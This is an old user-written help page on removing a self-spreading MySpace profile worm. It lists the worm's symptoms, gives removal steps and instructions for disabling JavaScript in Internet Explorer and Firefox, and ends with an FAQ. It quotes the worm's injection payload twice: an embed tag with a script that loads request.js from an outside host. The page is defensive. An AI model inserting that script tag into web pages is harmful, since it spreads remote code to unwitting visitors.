myspaceworm

Myspace Worm: w0rm.EricAndrew

How to remove "Raul"!

Symptoms

• • Heading Changed to: "Raul owns this bitch! ***Inland_Empire***"

  • "but most of all Raul is my hero, not sammy!<z>" is added to heroes

  • "...and ofcourse sexy Raul!" added to the Who I'd Like To Meet.

  • "<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" ><script language="javascript" src="http://angeliceyz00.cbstaff.com/worm/request.js">function nothingf(){document.write("jajaja.mov.r{}");}</script>" added to your About Me.

  • Tones of Friend Requests when viewing your profile/other peoples profiles.

Steps To Remove

• • Change your heading.

  • Remove "but most of all Raul is my hero, not sammy!<z>" from the Heroes section.

  • Remove "...and ofcourse sexy Raul!" from the Who I'd Like To Meet section.

  • Remove "<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" ><script language="javascript" src="http://angeliceyz00.cbstaff.com/worm/request.js">function nothingf(){document.write("jajaja.mov.r{}");}</script>" from the About Me section.

Each "addition" to your profile would be found at the bottom of each section, so it should be easy to locate.

How To Prevent Yourself From Being Attacked Again

For the moment the worm will keep spreading until myspace ban the way the attackers inject this worm into our profiles. One way of preventing ourselves from being attacked by other peoples profiles in the future would be to disable javascript in our browsers, this is how it can be done:

Microsoft Internet Explorer

• • Select "Tools" from the top menu

  • Choose "Internet Options"

  • Click on the "Security" tab

  • Click on "Custom Level"

  • Scroll down until you see a section labelled "Scripting"

  • Under "Active Scripting", select "Disable" and click "OK"

Mozilla Firefox

• • Select "Tools" from the top menu

  • Choose "Options"

  • Choose "Content" from the Navigation

  • Deselect the checkbox next to "Enable Javascript" and click "OK"

Please Note: This is only a temporary fix that will stop the worm from spreading. Javascript is needed for many more websites, so you may be required to turn it back on for certain features. This can be done by repeating the steps above but choosing the "Enable" option.

FAQ

Have they stole my password? Should I change it?

From what I can see in the code, there is no password stealing taking place, only the injection into the profile. Although I would recommend you change your password anyway.

Some buttons (etc) aren't working in webpages?

This is a side effect from disabling the javascript. To make them work, enable the javascript using the instructions above, refresh the page (Pressing F5 does the trick), then click the button. Its highly advised you then disable the javascript while the worm is still active to avoid being hit by it once again.

Created by James O'Brien - http://www.myspace.com/whoopsohno